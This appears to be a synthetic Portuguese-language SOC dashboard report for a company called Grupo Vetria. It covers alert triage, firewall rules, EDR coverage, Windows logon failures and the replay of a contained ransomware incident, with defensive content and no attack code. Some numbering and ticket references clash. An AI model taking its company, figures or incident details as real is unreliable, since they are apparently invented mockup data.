ConfidencialConfidencial
Classificação: Uso Interno·Distribuição: Diretoria de TI·Rev 2.0·20/07/2026
Fl. 01 / 19
Laudo operacional de segurança · Semana 29 · emissão dom 20/07/2026 · 15:12
Segurança & SOC
Uso Interno · SOCA operação de segurança do Grupo Vetria — 4.200 endpoints em 43 sites, três datacenters e um SOC 24×7 com turno noturno do MSSP Vigia8 — documentada em dezessete evidências: da fila de triagem ao threat intel. Wazuh SIEM · FortiGate · AD VETRIA.CORP · Sysmon · SOAR Shuffle.
Sumário de EvidênciasFl.
EV-01Mesa de Triagem02
minha fila está sob controle? · 347 alertas · fila 28 · 3 estouram SLA
EV-02Perímetro em Corte03
que porta está aberta e quem é o dono? · 9,4 Gbps in · 2,1 bloq
EV-03Frota & Cobertura04
o que eu NÃO enxergo? · 88 sem EDR · 3 fontes mudas · MFA 91,4%
EV-04Identidade & Windows05
quem erra senha às 03h? · 18.442 falhas 4625 · pico 1.208/h
EV-05Sala de Crise· 17/0706
o que está contido e o que falta? · EV-2026-0142 · MTTC 42 min
EV-06SOAR & Posturaboard07
o que mostro na quinta? · 87% auto · risco 62/100 · R$ 4,2M
EV-07Regras & Tuning SIEM08
quais regras carregam a detecção? · 3.428 regras · 41 em tuning
EV-08Telemetria Sysmon09
o que os 4.037 agentes contam? · 14,5M ev/24h · EID 1/3/11/22
EV-09Sessões de Firewall10
o que passa na borda agora? · 128k sessões · 2.410 novas/s
EV-10IPS & Assinaturas11
que exploit bate na porta? · 12,3k ev/24h · 9.412 sigs · 14 crít
EV-11DNS & Egress12
alguém sai escondido pelo DNS? · 41M consultas · 12 DGA
EV-12Kerberos & NTLM13
estão pescando tickets? · 312 TGS RC4 · 3 SPNs em watch
EV-13Auditoria Windows14
o que mudou sem pedido? · 7045/4698/4663 · 1102 em investigação
EV-14Quarentena EDR15
o que o agente segurou? · 7 arquivos · 34 exclusões (3 em revisão)
EV-15Vulnerabilidades16
quais CVEs importam? · 1.842 abertos · KEV 17 · EPSS>0,7: 28
EV-16Threat Intel17
meus IOCs batem no ambiente? · 48.213 ativos · 61 hits/24h
EV-17Indicadores & Automação18
quais sinais viram ticket? · 15 indicadores · evento → SIEM → webhook → ITSM
janela de dados das evidências: seg 14/07 00:00 → dom 20/07 15:12 · fuso Brasília · dd/mm · vírgula decimal
Quadro 1 · Identificação da Operação
EmpresaGrupo Vetria · indústria de bens de consumo (higiene e limpeza)
Escopo4.200 endpoints · 43 sites — matriz SP · fábrica Jundiaí · 3 DCs · 38 filiais
StackWazuh SIEM · FortiGate · AD VETRIA.CORP · Sysmon · SOAR Shuffle
CoberturaSOC 24×7 · turno 22h–06h: MSSP Vigia8 (2 analistas remotos)
Volume11,8k EPS médio · pico 23,4k às 02h · 30,6B eventos/mês
PosturaATENÇÃO risco 62/100 · ontem 58 · apetite da diretoria 45
AO VIVO · dom 20/07 15:12 · 11,8k EPS
01 / 18
Grupo Vetria / Segurança & SOC / Mesa de Triagem
POSTURA: ATENÇÃO1 incidente ativo · 28 na fila
15:12 · dom 20/07·Wazuh SIEM · FortiGate · AD VETRIA.CORP·30 s ↻AO VIVO
Postura do SOC
ATENÇÃO
risco 62/100 · ontem 58 · apetite da diretoria 45
Alertas hoje
347
média dos domingos: 298 · 31% concentrados 02h–04h
Fila agora
28
19 aguardando triagem · 9 em atendimento
Estouram SLA · 1h
3
próximo: ALR-8841 · 15h40 · mesma rajada de 14h40
Escalados MSSP
6
Vigia8 · mais antigo aguarda retorno há 22 min
MTTA hoje
4,2 min
meta 5 min · P95 9,8 min · ontem 5,1 min
Turno atual
14h–22h
6 analistas em mesa · presencial matriz SP
22h–06h · MSSP Vigia8 · 2 analistas remotos
Funil de Detecção · 30 dias
Wazuh SIEM · correlação + EDR + FortiGate · 218 casos no mês30,6Beventos brutos coletados
▾ 3,1% indexados
942Mindexados no SIEM
▾ 0,0013% viram alerta
12,4kalertas gerados
▾ 1,8% viram caso
218casos triados
▾ 4,1% viram incidente
9
ingestão: 11,8k EPS méd · pico 23,4k · 02h (backup + varredura)
janela 20/06 → 20/07
218 casos = 7,3/dia ›
‹ incidentes confirmados no mês
largura ∝ log₁₀ do volume · Wazuh indexer
R$ 4,2M
de exposição evitada no mês
metodologia: custo médio de parada × horas de contenção antecipada · gestão de riscos Vetria
Esteira de Triagem · fila priorizada
ordenada por prazo de SLA · 3 estouram na próxima hora · SLA P2 60 min · P3 4h · P4 8hP2ALR-8841Beacon C2 periódico → 203.0.113.74:8443estoura em 0h28
wks-fab-104·chegou 14h40SIEMprazo 15h40
P2ALR-8843PowerShell ofuscado pós-anexo de e-mailestoura em 0h40
wks-fab-109·chegou 14h52EDRprazo 15h52
P2ALR-8846Enumeração SMB anômala em srv-arq-01estoura em 0h53
srv-arq-01·chegou 15h05SIEMprazo 16h05
P3ALR-8824Antivírus desativado · base local de clientesestoura em 2h38
pdv-fil07-03·chegou 13h50EDRLGPD · dado pessoalprazo 17h50
P3ALR-8832Logon de terceiro às 02h40 · fora de janelaestoura em 2h46
vpn-forti-01·conta manutencao-predialSIEM→ Vigia8 · aguardando há 22minprazo 17h58
P3ALR-8838Exportação em massa da base de RH · d.oliveiraestoura em 3h08
srv-folha-01·chegou 14h20EDR→ N2LGPD · dado pessoalprazo 18h20
P4ALR-8819Tráfego na porta 8443 · regra sem dono (2019)estoura em 6h32
fgt-mtz-01·chegou 13h44FWprazo 21h44
+12 na fila · P3/P4 aguardando triagem · mais antigo há 1h05 · 9 em atendimento com analista
Ocupação do Turno
6 analistas · 14h–22h · 9 casos em atendimentoRenata C.2 casos
coordena INC-0147 · CS-2208
líder do turno · 44 triados · ack 15h08
Douglas M.2 casos
CS-2210 · CS-2214 · endpoint/EDR
61 triados hoje · último ack 15h03
Aline F.2 casos
CS-2211 · CS-2216 · dados pessoais/LGPD
57 triados hoje · último ack 14h57
Túlio B.1 caso
CS-2209 · perímetro FortiGate
63 triados hoje · último ack 15h10
Marcos P.1 caso
CS-2213 · identidade AD VETRIA.CORP
48 triados · aprovação PB-11 com ele
Yasmin R.1 caso
CS-2217 · triagem geral
46 triados · absorve P3 da fila até 16h
319 de 347 alertas já triados hoje · ocupação média 68% · decisão do plantão: Yasmin puxa os P3 da fila até 16h
Últimas Ações do SOAR
Shuffle · janela 14h–15h12 · 87% auto · 13% humano15h09AUTO
bloqueio de 203.0.113.74 replicado nas 38 filiais
PB-03 · FortiGate · gatilho: ALR-8841
15h04AUTO
coleta forense EDR disparada em wks-fab-104
PB-07 · pacote de triagem · 4 artefatos
14h58HUMANO
svc-backup marcado p/ revisão de credencial
PB-11 · aguarda aprovação de Marcos P.
14h52AUTO
IP 203.0.113.74 bloqueado · playbook PB-03
fgt-mtz-01 · política EDGE-DENY · TTL 24h
14h47AUTO
arquivo em quarentena em pdv-fil07-03
PB-05 · hash sha256 …9f2e · EDR
14h41AUTO
IOCs de ALR-8841/8843/8846 enriquecidos
PB-01 · 3 fontes de reputação · veredito: malicioso
14h33AUTO
ticket TK-30412 aberto no ITSM
PB-09 · vínculo ALR-8838 · fila N2
14h26AUTO
4 alertas duplicados suprimidos
PB-02 · correlação host+regra · janela 15 min
14h18HUMANO
suspensão de VPN proposta · manutencao-predial
PB-11 · aprovação pendente · vence 16h00
312 ações/semana ≈ 61h ≈ 1,4 analista não contratado · 2 aprovações humanas pendentes
Wazuh · EDR · FortiGate · fila 28 · SLA P1 15 min (contrato Vigia8) · Grupo Vetria · dom 20/07 15:12
EV-01 · 1 de 17
Grupo Vetria / Segurança & SOC / PERÍMETRO EM CORTE
POSTURA: ATENÇÃO1 incidente ativo · 28 na fila
15:12 · dom 20/07·Wazuh SIEM · FortiGate · AD VETRIA.CORP·30 s ↻AO VIVO
Corte Transversal do Perímetro — quem atravessa a parede, quem é o dono
policy fgt-mtz-01 · 214 regras · CMDB/GMUD cruzados · 5 travessias · 1 sem dono
travessia permitida · com dono
saída crítica de negócio
poro sem dono
descartado na parede
ação: RITM-2201 aberto 14h20 · bloquear 8443 e caçar o dono · janela GMUD ter 22/07 22h · resp. Douglas M.
Top 10 Regras por Hit
policy fgt-mtz-01 · hits 24h · barra em escala log₁₀escala log₁₀
10³10⁴10⁵10⁶10⁷
R-2148,4M
deny · WAN → any implícita · fim de políticaBLOQUEIO
R-0014,2M
permit · 443 → portal-vetria WAF em linhaPERMIT
R-0761,6M
deny · geo-block RU·KP·IR GMUD 1980BLOQUEIO
R-058812k
permit · NF-e → SEFAZ-SP rota fiscal dedicadaNEGÓCIO
R-102274k
permit · 10443 VPN-SSL MFA obrigatórioPERMIT
R-031158k
permit · 25 → srv-mail-01 TLS obrigatórioPERMIT
R-14194k
deny · 445 SMB vindo da WAN higiene básicaBLOQUEIO
R-00971k
permit · 53 → resolvers somente 10.20.30.53PERMIT
R-18812k
rate-limit · ICMP echo 50 pps por origemRATE-LIMIT
R-1633,1k
permit · 8443 → 10.20.61.44 último hit 14h58SEM DONO
R-163 casa com o poro órfão 8443 — 3,1k hits vivos numa regra de 2019 · decisão: negar na GMUD de ter 22/07 22h (RITM-2201)
Throughput na Borda · 24 h
SNMP 60 s · Gbps · entrada azul · bloqueado grafite12,09,06,03,00
Gbps · entrada WAN fgt-mtz-01
varredura 02h · pico 11,2 G · 4,1 G bloq
agora 9,4 G · 2,1 bloq
15h19h23h03h07h11h15h12
faixa grafite = bloqueado na parede · média 22,3% da entrada · varredura 02h de 203.0.113.0/24 randomizado — morreu na deny implícita · sem ação humana
Top Países de Origem — Bloqueados
GeoIP · 18,4M sessões bloqueadas · 24hCN6,2M · 33,7%
China 74% SYN scan portas 1–1024
US3,8M · 20,7%
EUA abuso de nuvem · 61% em 443
RU2,4M · 13,0%
RússiaGEO-BLOCK · GMUD 1980
NL1,5M · 8,2%
Países Baixos hosting bulletproof
VN1,1M · 6,0%
Vietnã botnet IoT · telnet 23
BR0,9M · 4,9%
Brasil brute force VPN 10443→ EV-05
IN0,7M · 3,8%
Índia SIP 5060 · scanners
KR0,5M · 2,7%
Coreia do Sul RDP 3389
+611,3M · 7,1%
Outros cauda longa · 61 países
geo-block RU·KP·IR ativo (GMUD 1980) · 203.0.113.201 — o IP que bate no 8443 — origina de AS BR e não cai no geo-block
FortiGate fgt-mtz-01 (HA) · syslog → Wazuh · 214 regras ativas · Grupo Vetria · dom 20/07 15:12
EV-02 · 2 de 17
Grupo Vetria / Segurança & SOC / FROTA & COBERTURA
POSTURA: ATENÇÃO1 incidente ativo · 28 na fila
15:12 · dom 20/07·Wazuh SIEM · FortiGate · AD VETRIA.CORP·30 s ↻AO VIVO
Muro de Cobertura · 43 sites
célula = site · barra 1 EDR instalado · barra 2 vivo <24h · 1 crit · 4 warn · 38 ok — console EDR + AD VETRIA.CORPMTZMATRIZ SÃO PAULO
EDR 1.198/1.240 · inst 1.218 · MFA 93,1%
1.240 endpoints22 ROLLOUT · FIM 29/07
FABFÁBRICA JUNDIAÍ
EDR 590/610 · inst 598 · MFA 86,2%
610 hosts12 LEGADO · COMPENSAÇÃO: VLAN OT
DCJDI ON-PREM
EDR 157/158
MFA 97%
DCSPO COLO
EDR 145/146
MFA 97%
DRNUVEM
EDR 76/76 · inst 76
MFA 98%STANDBY
F01CAMPINAS
EDR 57/59 · inst 59
MFA 93%
F02RIB. PRETO
EDR 51/52 · inst 52
MFA 90%
F03S.J. CAMPOS
EDR 53/54 · inst 54
MFA 93%
F04SANTOS
EDR 46/47 · inst 47
MFA 90%
F05BAURU
EDR 41/42 · inst 42
MFA 93%
F06UBERLÂNDIA
EDR 34/41 · MFA 88%
COBERTURA 85%
F07B. HORIZONTE
EDR 76/78 · inst 78
MFA 93%
F08JUIZ DE FORA
EDR 39/40 · inst 40
MFA 90%
F09RIO DE JAN.
EDR 80/82 · inst 82
MFA 93%
F10NITERÓI
EDR 43/44 · inst 44
MFA 90%
F11VITÓRIA
EDR 45/46 · inst 46
MFA 93%
F12SALVADOR
EDR 64/66 · MFA 91%
FGT MUDO 3D
F13F. SANTANA
EDR 38/38 · inst 38
MFA 93%
F14ARACAJU
EDR 39/40 · inst 40
MFA 90%
F15MACEIÓ
EDR 42/46 · inst 43
MFA 93%
F16RECIFE
EDR 62/64 · inst 64
MFA 90%
F17JOÃO PESSOA
EDR 41/42 · inst 42
MFA 93%
F18NATAL
EDR 43/44 · inst 44
MFA 90%
F19FORTALEZA
EDR 60/62 · inst 62
MFA 93%
F20TERESINA
EDR 40/44 · inst 41
MFA 90%
F21SÃO LUÍS
EDR 43/49 · inst 44
MFA 93%
F22BELÉM
EDR 53/58 · inst 55
MFA 90%
F23MANAUS
EDR 54/55 · inst 55
MFA 93%
F24BRASÍLIA
EDR 74/76 · inst 76
MFA 90%
F25GOIÂNIA
EDR 55/56 · inst 56
MFA 93%
F26ANÁPOLIS
EDR 38/38 · inst 38
MFA 90%
F27C. GRANDE
EDR 44/45 · inst 45
MFA 93%
F28CUIABÁ
EDR 48/55 · MFA 89%
6 SEM EDR
F29CURITIBA
EDR 70/72 · inst 72
MFA 93%
F30LONDRINA
EDR 47/48 · inst 48
MFA 90%
F31MARINGÁ
EDR 43/44 · inst 44
MFA 93%
F32JOINVILLE
EDR 49/50 · inst 50
MFA 90%
F33FLORIANÓP.
EDR 51/52 · inst 52
MFA 93%
F34BLUMENAU
EDR 41/42 · inst 42
MFA 90%
F35P. ALEGRE
EDR 68/70 · inst 70
MFA 93%
F36CAXIAS SUL
EDR 44/45 · inst 45
MFA 90%
F37PELOTAS
EDR 40/40 · inst 40
MFA 93%
F38SOROCABA
EDR 15/44 · MFA 84%
ROLLOUT · 28
Frota 4.200: matriz 1.240 · fábrica 610 · DCs 380 · filiais 1.970 — EDR 4.112 inst · 4.037 vivos · 218 desatualizados · 88 sem (12 legado + 76 rollout) · MFA 91,4% (311/3.612 sem)
decisão 15h04 · Renata C.: endpoint sem EDR perde acesso à VPN a partir de seg 21/07 08h · exceção única: VLAN OT (GMUD 2231) · dono: endpoint-eng
decisão 15h04 · Renata C.: endpoint sem EDR perde acesso à VPN a partir de seg 21/07 08h · exceção única: VLAN OT (GMUD 2231) · dono: endpoint-eng
Fontes de Log · esperadas × recebendo
Wazuh coletores · syslog + agente · janela 24 h · 206 fontes ok ocultas da lista214
esperadas
catálogo CMDB
206
recebendo ok
meta ≥ 210 (98%)
5
atrasadas
pior: 22 min
3
mudas
pior: 3d 6h
96,3% no prazo · ingestão 11,8k EPS méd · pico 23,4k · 02h (backup + varredura)
fonteorigem / tipoúltimo eventogap24 hestado / ação
fgt-fil12-01FortiGate syslog · FIL-12 Salvadorqui 17/07 09h143d 6hMUDA · TK-30412 · infra-redes
srv-arq-01auditoria de arquivos · DC-JDIdom 20/07 06h029h 10mMUDA · TK-30447 · verif. 15h30
wks-fab-101Sysmon · chão de fábricadom 20/07 11h084h 04mMUDA · reinstalar agente
vpn-forti-01FortiGate VPN-SSL · bordadom 20/07 14h5022 minATRASADA · fila syslog
srv-folha-01agente Wazuh · folha Seniordom 20/07 14h5418 minATRASADA · janela batch
pdv-fil07-03agente Wazuh · PDV FIL-07dom 20/07 15h0012 minATRASADA · link da filial
dc-spo-01WEF · DC SP colocationdom 20/07 15h039 minATRASADA · em observação
portal-vetrianginx/WAF · portal B2Bdom 20/07 15h057 minATRASADA · normalizando
3 mudas: fgt-fil12-01 mudo há 3d — causa raiz da violação de SLA EV-0121 · escalado Vigia8 + infra-redes (TK-30412) · Douglas M. cobra retorno até 16h00
Ilha de análise · adversário & leste-oesteREPLAY · EV-2026-0142 · qui 17/07
Trilha de Campanha · MITRE ATT&CK
detecções 30 d · Wazuh → ATT&CK · trilha 1→7 = EV-2026-0142InicialExecuçãoPersist.Esc. privEvasãoCredenc.Descob.LateralImpacto
T1566412
Phishing
T119037
Expl. app pública
T113354
Serviço remoto ext.
T10782.348
Contas válidas
T1204188
Execução p/ usuário
T10591.274
PowerShell / script
T104796
WMI
T156941
Serviços do sistema
T1053342
Tarefa agendada
T1547214
Autostart / registro
T113628
Criar conta
T15059
Web shell
T154877
Abuso de elevação
T113441
Manipulação de token
T157433
Hijack de DLL
T106812
Expl. p/ privilégio
T1027391
Ofuscação
T105561
Injeção de processo
T1562144
Desativar defesas
T107088
Limpeza de logs
T111018,4k
Força bruta
pico 1.208/h · 03h10
T1558117
Kerberoasting
T155264
Cred. em arquivos
T100352
Dump de credenciais
T10461.842
Varredura de serviços
T1082903
Info do sistema
T1018516
Sistemas remotos
T1069233
Grupos de permissão
T157073
Transf. de ferramenta
T155019
Pass-the-hash
T1021688
Serviços remotos · RDP
T153411
Phishing interno
T14907
Inibir recuperação
T148915
Parar serviços
T15312
Remover acesso
T14863
Criptografia p/ impacto
7CONTIDO · bloqueado: EDR · regra 4412 · qui 17/07 14h47detecções 30 dMTTC 42 min
Ranking Leste-Oeste · top-5 rotas
FortiGate · tráfego interno 24 h · largura ∝ log₁₀ESTAÇÕES → OT · CHÃO DE FÁBRICA214CRÍTICO · 100% BLOQ
10.20.40.0/22 → 10.20.88.0/24 · 12 origens · alvo wks-fab-101..112 · política PL-88 DENY
TERCEIROS · VPN → ERP PROTHEUS41237 BLOQ · EM ANÁLISE
manutencao-predial entre as origens · logon 02h40 fora de janela · TK-30398
ESTAÇÕES → SERVIDORES DC-JDI1.40896 BLOQ
10.20.40.0/22 → 10.20.10.0/24 · SMB/LDAP dentro do baseline
FILIAIS → MATRIZ · AD & ARQUIVOS3.216PERMITIDO
38 filiais → dc-jdi-01 · autenticação e GPO · sem desvio
SERVIDORES ↔ SERVIDORES · DCs8.940BASELINE
replicação + backup 02h · srv-bkp-01 responde pelo pico
decisão 14h40 · Aline F.: microssegmentação OT fase 2 antecipada — GMUD 2258 · janela qua 23/07 22h · dono: infra-redes
Licenciamento & parque · console EDR · contrato 2026
LICENÇAS EDR 4.112/4.200
RENOVA EM 43 d · 01/09
R$ 38/endpoint
12 LEGADO WIN7 · VLAN OT
76 ROLLOUT · fim 29/07
218 AGENTE ANTIGO · update qua 23/07
console EDR · AD VETRIA.CORP · Wazuh coletores · FortiGate — janelas 24 h e 30 d · Grupo Vetria · dom 20/07 15:12
EV-03 · 3 de 17
Grupo Vetria / Segurança & SOC / Identidade & Windows
POSTURA: ATENÇÃO1 incidente ativo · 28 na fila
15:12 · dom 20/07·Wazuh SIEM · FortiGate · AD VETRIA.CORP·30 s ↻AO VIVO
Sucessos de autenticação · 4624
Event Viewer → Wazuh · 6 DCs · escala log₁₀pico 6.412/h às 08h · baseline 7d +2,1%96.418sucessos · 24h
10¹10²10³10⁴1
conta · tipo
24.318
svc-protheus
serviço · ERP Protheus
18.204
svc-nfe
serviço · NF-e / SEFAZ-SP
12.440
svc-monitor
serviço · coletores Wazuh
8.211
svc-portal
serviço · portal-vetria · DMZ
4.926
svc-arquivos
serviço · srv-arq-01
342
adm-ti-01
admin de domínio · via PAM
118
renata.c
humana · SOC N2 · 14–22h
96
douglas.m
humana · SOC N1 · 14–22h
84
aline.f
humana · SOC N1 · 14–22h
14
svc-backup
serviço · job de fita 02h
6
manutencao-predial
logon 02h40 · fora de janela
2
administrator
builtin · desabilitação em GMUD
27.657
outras 3.581 contas
cauda · contas ativas na janela
✓ serviços = 71% do volume · manutencao-predial (terceiro) logou às 02h40 — Túlio B. valida com a portaria · demais contas dentro do padrão
AD VETRIA.CORP
espinha de contas · 6 DCs3.612contas habilitadas
43 sites · 214 grupos
43 sites · 214 grupos
COBERTURA MFA91,4%
311 sem MFA · 187 no corte 31/07 · 124 exceção
3.474humanas
74serviço
23admin
41terceiros
controladores de domíniorepl ok · auth JDI 47%
dc-jdi-01PDC · fáb. Jundiaírepl 00:01OK
dc-jdi-02fáb. Jundiaírepl 00:02OK
dc-spo-01DC SP · colocationrepl 00:02OK
dc-spo-02DC SP · colocationrepl 00:04OK
dc-mtz-01matriz SPrepl 00:03OK
dc-dr-01DR · nuvemrepl 00:26SYSVOL +26m
✎ 311 sem MFA: 187 entram no corte de 31/07 · 124 com exceção assinada pela diretoria — revisão set/26
Rosácea horária · 4625
24 fatias · 1 fatia = 1h02–04h · spraydemaiscomercial 08–19h
Falhas de autenticação · 4625
janela 24h · pico 03h10 · escala log₁₀18.442falhas · 24hpico 1.208/h às 03h10 · 47 lockouts (4740)
conta · tipo
10¹10²10³10⁴1
svc-protheus
serviço · srv-erp-01
12
svc-nfe
serviço · emissão fiscal
3
svc-monitor
serviço · sem falhas 24h
0
svc-portal
serviço · form externo · WAF
164
svc-arquivos
serviço · srv-arq-01
8
adm-ti-01
admin · 4672 correlatos
28
renata.c
humana · 2 typos
2
douglas.m
humana · 5 typos
5
aline.f
humana · 1 typo
1
svc-backup
alvo do spray · SOC-2214
2.417
manutencao-predial
terceiro · janela 07h–18h
1
administrator
alvo padrão · spray
1.893
outras 3.581 contas
spray raso · 8–12 tent./conta
13.908
✎ spray 02h–04h de 203.0.113.44/.51 contra vpn-forti-01 — bloqueio no FortiGate às 04h12 · SOC-2214 · Renata C. · reset de svc-backup na GMUD de hoje 22h
Ticker de eventos Windows · por hora
1 célula = 1h · 03h = janela do spray · 15▾ = agora · Event Viewer → Wazuh · 6 DCsevento / hora
00
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15▾
16
17
18
19
20
21
22
23
4625 · falha de logon
18.442 · pico 1.208 · 03h10
192
218
704
1.208
1.002
386
468
731
1.044
1.176
1.132
1.058
864
948
1.102
986
1.021
1.084
872
598
512
444
381
311
4740 · conta bloqueada
47 · pico 9 · 03h · desbloq. 31
·
·
4
9
6
1
·
1
2
3
2
2
1
1
2
2
1
3
1
2
1
1
1
1
4672 · logon privilegiado
1.874 · pico 196 · 02h (backup)
31
28
196
44
38
33
41
58
102
118
112
104
88
96
109
101
98
94
82
64
52
48
71
66
Event Viewer → Wazuh · 4624/4625/4740/4672 · 6 DCs · janela 24h · Grupo Vetria · dom 20/07 15:12
EV-04 · 4 de 17
Grupo Vetria / Segurança & SOC / SALA DE CRISEREGISTRO DO INCIDENTE · QUI 17/07 · 14H05
INCIDENTE EV-2026-0142 · CONTIDOreplay do registro forense
15:12 · dom 20/07·Wazuh SIEM · FortiGate · AD VETRIA.CORP·30 s ↻AO VIVO
INCIDENTE CRÍTICO · RANSOMWARE CONTIDO · EV-2026-0142
vetor: phishing · anexo fatura_0687.docm · paciente zero: wks-fab-104
extensão .vetlock · detecção 14h05 → contido 14h47 · registro fechado 19h40
extensão .vetlock · detecção 14h05 → contido 14h47 · registro fechado 19h40
CONTIDO · 14H47
Hosts isolados
14/17
demais 3 desligados a frio
Contas resetadas
23/23
svc-backup incluída · 14h58
Hashes bloqueados
8
push EDR + FortiGate · 14h21
MTTC
42 min
detecção 14h05 · contido 14h47
Backup imutável
OK
há 6h · restore testado 12/07
Placar de Contenção · Checklist de Crise
war room #ir-0142 · EDR + SOAR Shuffle + Vigia8
Checklist de contenção
6/9
3 pendentes · 2 com prazo
Evidências preservadas
32
3 imagens de disco · hash ok
Playbooks executados
6
2 aprovações humanas
Janela do registro
5h35
14h05 → 19h40 · qui 17/07
✓
MSSP Vigia8 notificadobridge #ir-0142 aberta · prontidão do turno 22h–06h
14h11PB-02 · AUTO
✓
C2 203.0.113.88 bloqueadofgt-mtz-01 · política de saída · 8 hashes em push
14h19PB-04 · AUTO
✓
Diretoria avisadacomitê de crise convocado · sala de guerra às 14h45
14h32RENATA C.
✓
Seguradora acionadaapólice cyber · protocolo SIN-88213 aberto
15h05JURÍDICO
✓
Comunicação interna43 sites · orientação: não religar estações isoladas
15h40MARCOS P.
✓
Coleta forense concluídaimagem de disco wks-fab-104 · cadeia de custódia ok
16h05TÚLIO B.
Avaliação ANPD · notificação em 3 dias úteisart. 48 LGPD · RIPD parcial anexado ao caso
vence 23/07DPO
Restore validadosrv-arq-01 · 312 arquivos a partir do imutável · em curso
em cursoYASMIN R.
Varredura de persistência43 sites · scheduled tasks + run keys + contas novas
21h00ALINE F.
Decisão do comitê (17/07 17h20): clientes B2B só serão notificados após validação do restore — DPO + jurídico · resgate: não pago
Árvore de Processo Forense
Sysmon + EDR · host wks-fab-104
sem movimento lateral confirmado até 19h40
varredura 21h00 · decisão: VLAN OT segregada
varredura 21h00 · decisão: VLAN OT segregada
EID 1 · processoEID 3 · redeEID 11 · arquivo
IOC: 8 hashes · 1 IP · ext .vetlock
push 14h21 · watchlist Wazuh 72h
push 14h21 · watchlist Wazuh 72h
winword.exeEID 1
14h05 · fatura_0687.docm
powershell.exeEID 1
14h07 · -enc · ofuscado
rundll32.exeEID 1
14h12 · public\upd.dll
203.0.113.88:443EID 3
14h19 · beacon TLS · C2
gravação *.vetlockEID 11
14h21 · srv-arq-01 · 312 arq
EDR · regra 4412
14h23 · processo finalizado
host isolado · contido
14h47 · MTTC 42 min ✓
14h05
14h15
14h25
14h35
14h47
∕∕
16h40
erradicação
19h40
fechado
reconstrução do EDR validada manualmente — perícia: Túlio B. · imagem de disco preservada · custódia ok
Kill-chain do ataque
cadeia de 7 elos · rompida no elo 7 · EDR + Wazuh · qui 17/07
Ações SOAR da contenção
Shuffle · 2 aprovações humanas no bridge
14h05PB-01alerta EDR correlacionado → caso EV-2026-0142 aberto · P1AUTO
14h19PB-04IP 203.0.113.88 bloqueado no FortiGate · política de saídaAUTO
14h21PB-078 hashes → lista de bloqueio EDR + FortiGateAUTO
14h32PB-09isolamento wks-fab-101..112 + 2 servidores · fim 14h47 · aprovou Renata C.HUMANO
14h58PB-05reset de 23 contas · svc-backup incluída · aprovou Douglas M.HUMANO
15h20PB-11IOC → watchlist Wazuh + MSSP Vigia8 · vigília de 72hAUTO
Replay do incidente EV-2026-0142 · qui 17/07 14h05→19h40 · EDR + Wazuh + SOAR Shuffle · Grupo Vetria · dom 20/07 15:12
EV-05 · 5 de 17
Grupo Vetria / Segurança & SOC / SOAR & POSTURA
POSTURA: ATENÇÃO1 incidente ativo · 28 na fila
15:12 · dom 20/07·Wazuh SIEM · FortiGate · AD VETRIA.CORP·30 s ↻AO VIVO
Circuito SOAR · do alerta à ação sem tocar teclado
SOAR Shuffle · 12 playbooks ativos · webhook Wazuh · semana 29WAZUH SIEM12,4k alertas/mês · 11,8k EPS
ENRIQUECIMENTOGeoIP · VirusTotal · AD VETRIA.CORP
CORRELAÇÃOdedup · 218 casos/mês
GATE
87%AUTO271 ações/sem
13%HUMANO41 ações/sem
PB-03 · BLOQUEIO IPFortiGate · 118/sem
PB-07 · ISOLAR HOSTEDR · 64/sem
PB-11 · RESET DE CONTAAD · 89/sem
FILA DO ANALISTAaprovação dupla · N2
EXECUÇÃO ASSISTIDA41/sem · Túlio B.
Retorno da automação · sem. 29
312 ações/semana
≈ 61 h de trabalho manual poupado
≈ 1,4 analista não contratado
base 11,7 min/ação · FTE CLT 44 h/sem · média do trimestre
MTTD → MTTR por incidente · eixo log
casos Wazuh · SLA Vigia8 · tri abr–jul4,2 min
MTTA hoje · fila 28
42 min
MTTC do EV-0142
2
violações no tri
EV-2026-0142 · ransomware · qui 17/07 · Renata C.3 min → 42 min ✓
EV-2026-0137 · phishing dirigido · sex 11/07 · Douglas M.11 min → 1h50 ✓
EV-2026-0129 · malware em estação · ter 08/07 · Aline F.2 min → 9 min ✓
EV-2026-0121 · intrusão em filial · sáb 28/06 · turno Vigia81h05 → 6h50 ✗
causa: log de filial mudo · fgt-fil12-01 · cruzou a meta contratual de 4h
2 min5 min1 h4 h8 h24 h
CONTRATO VIGIA8
P1: reconhecer 15 min · conter 4h · vigência mar/27 · 2 violações no tri (EV-0121 · EV-0098)
detecção
contenção
decisão: watchdog de fontes por filial (dono: infra · até 15/08) — sem log, o relógio do MTTD nem começa a contar · revisão do contrato Vigia8 em set/26
Alertas por dia · 13 semanas
Wazuh alertas/dia · s17–s29 · feriados BR
s17s18s19s20s21s22s23s24s25s26s27s28s29
seg
ter
qua
qui04/06894
sex
sáb
dom347
média 413/dia · pico 894 (qui 17/07 · EV-2026-0142)
Corpus Christi 04/06 · véspera 03/06: postura elevada
próximo feriado nacional: 7 de setembro (seg) — véspera de feriado · postura elevada · plantão Vigia8 reforçado · sáb 28/06 tracejado = EV-0121
Funil do mês · do bruto ao incidente
Wazuh · janela 30d · jun→jul
3,1%
0,001%
1,8%
4,1%
30,6B
brutos
942M
indexados
12,4k
alertas
218
casos
9
incidentes
exposição evitada no mês: R$ 4,2M
metodologia: custo médio de parada (R$/h por serviço)
× horas de contenção antecipada vs. linha de base do tri
× horas de contenção antecipada vs. linha de base do tri
RESUMO EXECUTIVO
SEMANA 29 · 20/07 · print-readyVelocímetro de risco score composto · GRC · rev dom 15:12
62/100
ATENÇÃO
ontem 58 (agulha-fantasma) · Δ +4
apetite da diretoria: 45 · desvio +17
apetite da diretoria: 45 · desvio +17
Serviços de negócio · custo de parada R$/h · validado c/ controladoria
NF-e / SEFAZfaturamento · matriz + 38 filiais
R$ 138k/h
incidente ativo · 14h37
ERP Protheussrv-erp-01 · DC Jundiaí
R$ 96k/h
operando
PDV filiais38 filiais · pdv-fil07-03 em obs.
R$ 41k/h
operando
Portal B2Bportal-vetria · DMZ
R$ 18k/h
operando
Folha Seniorsrv-folha-01 · janela dia 25
R$ 12k/h
janela
Selos de compliance GRC · auditoria interna · jul/26
CONFORME · 3 PENDÊNCIAS
CIS 1818 controles
ISO 27001 · A14 domínios
LGPD10 requisitos
ISO A.8.16 · monitoramento de atividades em filiais — dono: infraplano 15/08
LGPD · RIPD do PDV pendente de assinatura — dono: DPOminuta 24/07
CIS 8 · retenção de logs 90d nas filiais — dono: infraliga à EV-0121
licenças: EDR 4.112/4.200 · renovação em 43d · R$ 38/endpoint — Wazuh + Shuffle: OSS · suporte via contrato Vigia8
SOAR Shuffle · 312 ações/sem · contrato Vigia8 · semana 29 · Grupo Vetria · dom 20/07 15:12
